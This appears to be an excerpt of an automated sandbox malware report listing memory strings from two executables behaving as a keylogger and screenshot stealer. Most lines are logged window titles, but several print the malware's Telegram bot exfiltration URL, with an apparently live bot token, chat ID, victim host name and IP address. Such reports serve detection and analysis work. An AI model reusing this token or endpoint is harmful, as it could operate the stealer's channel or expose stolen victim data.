Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :17]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:45]<<Program Manager>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:18]<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:27]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:45]<<Program Managernction"===typeof btoa;var F="function"===typeof Symbol&&"symbol"===typeof Symbol()?Symbol():void 0,G=F?function(a,b){a[F]\|=b}:function(a,b){void 0!==a.g?a.g\|=b:Object.defineProperties(a,{g:{value:b,configurable:!0,writable:!0,enumerable:!1}})};function va(a){var b=H(a);1!==(b&1)&&(Object.isFrozen(a)&&(a=Array.prototype.slice.call(a)),I(a,b\|1))}
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:12]<<Program Manager>>D
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111B000.00000004.00000020.00020000.00000000.sdmp, KeyDataYRTmqAXe.txt.9.dr	Binary or memory string: [07:21:34]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :23:02]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E37000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--0]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:43]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, KeyDatanYvTSQpf.txt.9.dr	Binary or memory string: [07:23:00]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111B000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003EAE000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:24]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :15]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:17]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQUWDdOhIko2Dt
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2730998097.00000000082C0000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:25]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E37000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:08]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:41]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1:46]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041D5000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001147000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:17]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:43]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2723224019.00000000055BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :22:01]<<Program Manager
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:25]<<Program Manager>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:42]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003EAE000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:07]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E37000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2730998097.00000000082C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:18]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:56]<<Program Manager>>H
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp, KeyDataWrlEoSmg.txt.9.dr	Binary or memory string: [07:22:41]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:06]<<Program Manager>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041EF000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:52]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:08<<Program Manager>>
Source: KeyDataGlLPGWOk.txt.9.dr	Binary or memory string: [07:22:40]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:44]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:20<<Program Manager
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:06]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:16]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp, KeyDatanYvTSQpf.txt.9.dr	Binary or memory string: [07:22:54]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:16Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\system32\wbem\wbemsvc.dll]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FC:\Users\user\AppData\Local\Adobe07:21:25]<<Program Manager>>
Source: KeyDataNErTutaN.txt.9.dr	Binary or memory string: [07:22:53]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:15]<<Program Manager>>}d
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1:44]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2730998097.00000000082C0000.00000004.00000020.00020000.00000000.sdmp, KeyDataVqynSimp.txt.9.dr	Binary or memory string: [07:22:19]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:46]<<Program Managern d)Object.prototype.hasOwnProperty.call(d,e)&&(a[e]=d[e])}return a};ha("Object.assign",function(a){return a\|\|na});
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp, KeyDatanYvTSQpf.txt.9.dr	Binary or memory string: [07:22:55]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010B8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2722864980.0000000005570000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:15]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 07:22:50]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-ScreenshotlibSWTKN.BMP:::user-PC\user\8.46.123.189:15]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:38]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:11]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 07:22:33]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:22]<<Program Manager>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:22]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 59c113--0]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003EAE000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:45]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:39]<<Program Manager>>F
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010B8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2722864980.0000000005570000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:14]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:07]<<Program Manager>>pingStri
Source: DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003EAE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: https://api.telegram.org/bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-ScreenshotlibSWTKN.BMP:::user-PC\user\8.46.123.189]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:04]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:46]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 07:21:58]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:21]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:18<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:25]..Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2730998097.00000000082C0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:20]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manageroarde
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:56]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp, KeyDatauRYIcDki.txt.9.dr	Binary or memory string: [07:23:13]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111D000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:03]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041D5000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:46]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ogram Ma]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111B000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:37]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:01]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ThunderRT6PictureBoxDC:21:45]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:58]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:09]<<Program Managere_id":"AgADMhkAAjjDOFA","file_size":396},"caption":"DC-KL:::user-PC\\user\\8.46.123.189","caption_entities":[{"offset":25,"length":12,"type":"url"}]}}Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:18]<<type":"text/plain","file_id":"BQACAgQAAxkDAAI8jmeHqLW7bfKpo3vG_snN4OMYDlSCAAJIGQACOMM4UCNR2Z7Jvv56NgQ","file_unique_id":"AgADSBkAAjjDOFA","file_size":363},"caption":"DC-KL:::user-PC\\user\\8.46.123.189","caption_entities":[{"offset":25,"length":12,"type":"url"}]}}-99b9-fca7ff59c113--f5-b1ed-4060-99b9-fca7ff59c113--:21]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111D000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:59]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [23:11]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:08]<<Program Manager>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111D000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:02]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:25]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:06<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:58]<<Program Manager>>vU
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001147000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 21:53]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--8]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003EAE000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: <<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719577553.000000000423D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerQUWDdOhIko2D
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.000000000116B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:22:11]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :21:59]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2720228107.000000000427F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:11]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001147000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:44]<<Program Manager~
Source: KeyDataGlLPGWOk.txt.9.dr	Binary or memory string: [07:22:36]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:18]<<Program Manager>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111D000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.000000000112C000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001147000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:57]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:14]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111B000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001125000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:35]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:21:40]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001147000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:44]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:22]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001168000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111D000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:00]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.000000000111B000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003EAE000.00000004.00000020.00020000.00000000.sdmp, KeyDataYRTmqAXe.txt.9.dr	Binary or memory string: [07:21:23]<<Program Manager>>
Source: DESCRIPTION.exe, 00000009.00000002.2716450710.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2716450710.0000000001138000.00000004.00000020.00020000.00000000.sdmp, DESCRIPTION.exe, 00000009.00000002.2719338068.0000000003E66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:23:08]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:26]<<Program Manager>>
Source: OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.0000000001147000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2719141734.00000000041EF000.00000004.00000020.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715993099.00000000010F2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [07:22:51]<<Program Manager>>
